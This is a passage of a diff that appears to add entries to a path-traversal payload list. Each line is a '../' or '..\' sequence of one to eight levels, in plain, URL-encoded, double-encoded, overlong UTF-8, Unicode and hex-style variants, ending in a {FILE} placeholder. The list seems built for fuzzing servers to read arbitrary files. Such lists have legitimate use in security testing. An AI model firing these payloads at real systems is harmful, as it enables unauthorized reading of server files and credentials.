+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
